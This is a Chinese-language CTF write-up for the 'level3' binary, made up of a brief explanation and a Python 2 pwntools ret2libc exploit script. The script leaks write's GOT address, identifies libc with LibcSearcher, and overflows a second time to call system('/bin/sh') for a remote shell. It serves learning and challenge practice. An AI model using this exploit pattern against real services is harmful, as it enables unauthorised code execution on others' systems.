checksec level3
./level3
ida，无system无binsh，要通过泄露write函数来泄露libc版本，才能找到system和binsh的地址。
第一次溢出返回到write函数执行write(1,write_got,4)得到write的真实地址,计算得到system跟"/bin/sh"的真实地址,然后再返回到vulnerable_function函数,第二次回到溢出点,覆盖返回地址到system执行system("/bin/sh")
gdb爆偏移为140
脚本为
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Ret2libc exploit script for the "level3" CTF binary, written for
# Python 2 / pwntools (print statements, str payloads).  Reading guide:
#   1. overflow once, returning into write@plt so the program prints its own
#      GOT entry for write (a pointer into the loaded libc), then return into
#      vulnerable_function to get a second overflow;
#   2. identify the libc build from the leaked address with LibcSearcher and
#      derive the addresses of system() and the "/bin/sh" string;
#   3. overflow a second time with a system("/bin/sh") frame.
# The 140-byte padding is the return-address offset found with gdb (see the
# writeup text above the script).
from pwn import *
from LibcSearcher import LibcSearcher
import pwnlib
context.terminal=['gnome-terminal','-x','sh','-c']
# Challenge service as given in the writeup; the commented-out process() line
# runs the same script against a local copy of ./level3 instead.
sh = remote("111.198.29.45","39255")
#sh = process('./level3')
elf = ELF('./level3')
# Hard-coded PLT/GOT addresses of write; the commented-out elf lookups are the
# portable form.  Fixed addresses like these only hold for a non-PIE build of
# level3 -- confirm against the checksec output quoted at the top of the page.
write_plt = 0x08048340  # write_plt = elf.plt['write']
write_got = 0x0804A018  # write_got = elf.got['write']
vuln = 0x0804844B  # vulnerable_function, re-entered after the leak
print "write_plt =",hex(write_plt)
print "vuln =",hex(vuln)
print "leak write_got addr and return to vulnerable function again"
# Stage 1 frame: padding up to the saved return address, write@plt as the
# return address, vuln as write's own return address, then write's three
# arguments (fd=1, buf=write's GOT entry, len=4) following it on the stack.
payload = ''
payload += 'A'*140
payload += p32(write_plt)
payload += p32(vuln)
payload += p32(1) + p32(write_got) + p32(4)
#gdb.attach(sh)  # debugging aid for the local-process variant
sh.sendlineafter(':\n', payload)  # send once the prompt ending in ':\n' appears
print "get the related addr"
# NOTE(review): recv() returns whatever has arrived so far; the script takes
# the first 4 bytes and assumes they are the leaked pointer.
write_addr = u32(sh.recv()[0:4])
print "write_addr =",hex(write_addr)
# Identify the remote libc from write's leaked address, then compute the
# library base and the two symbols stage 2 needs from the matched offsets.
libc = LibcSearcher('write',write_addr)
libcbase = write_addr - libc.dump('write')
system_addr = libcbase + libc.dump('system')
binsh_addr = libcbase + libc.dump('str_bin_sh')
print "libcbase =",hex(libcbase)
print "system_addr =",hex(system_addr)
print "binsh_addr =",hex(binsh_addr)
print "getshell"
# Stage 2 frame: padding, system as the return address, a placeholder return
# address for system itself, then the pointer to "/bin/sh" as its argument.
payload = ''
payload += 'A'*140
payload += p32(system_addr)
payload += p32(0xdeadbeef)
payload += p32(binsh_addr)
sh.sendline(payload)
sh.interactive()  # hand the connection over to the user